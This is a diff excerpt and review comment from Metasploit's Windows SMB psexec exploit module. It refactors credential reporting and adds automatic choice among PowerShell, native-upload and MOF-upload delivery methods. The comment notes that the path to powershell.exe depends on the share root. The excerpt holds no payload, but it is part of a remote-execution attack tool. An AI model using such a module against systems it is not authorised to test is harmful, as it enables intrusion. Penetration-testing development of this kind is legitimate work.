modules/exploits/windows/smb/psexec.rb

```diff
@@ -102,151 +109,217 @@ def exploit
       return
     end
 
-    if datastore['DB_REPORT_AUTH'] and datastore['SMBUser'].to_s.strip.length > 0
-
-      service_data = {
-          address: ::Rex::Socket.getaddress(datastore['RHOST'],true),
-          port: datastore['RPORT'],
-          service_name: 'smb',
-          protocol: 'tcp',
-          workspace_id: myworkspace_id
-      }
-
-      credential_data = {
-          origin_type: :service,
-          module_fullname: self.fullname,
-          private_data: datastore['SMBPass'],
-          username: datastore['SMBUser'].downcase
-      }
-
-      if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'
-        credential_data.merge!({
-          realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,
-          realm_value: datastore['SMBDomain']
-         })
-      end
+    if datastore['SMBUser'].to_s.strip.length > 0
+      report_auth
+    end
 
-      if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/
-        credential_data.merge!({:private_type => :ntlm_hash})
+    case target.name
+    when 'Automatic'
+      if have_powershell?
+        vprint_status('Selecting PowerShell target')
+        powershell
       else
-        credential_data.merge!({:private_type => :password})
+        vprint_status('Selecting native target')
+        native_upload
       end
+    when 'PowerShell'
+      powershell
+    when 'Native upload'
+      native_upload
+    when 'MOF upload'
+      mof_upload
+    end
 
-      credential_data.merge!(service_data)
+    handler
+    disconnect
+  end
+
+  # TODO: Move to lib?
+  def have_powershell?
+    if datastore['SHARE'] == 'ADMIN$'
+      path = 'System32\\WindowsPowerShell\\v1.0\\powershell.exe'
+    else
+      path = 'Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
```

Comment:
This is the assumed path. Should work for ```C$``` and the like. The location of ```powershell.exe``` is entirely dependent on the root of the share.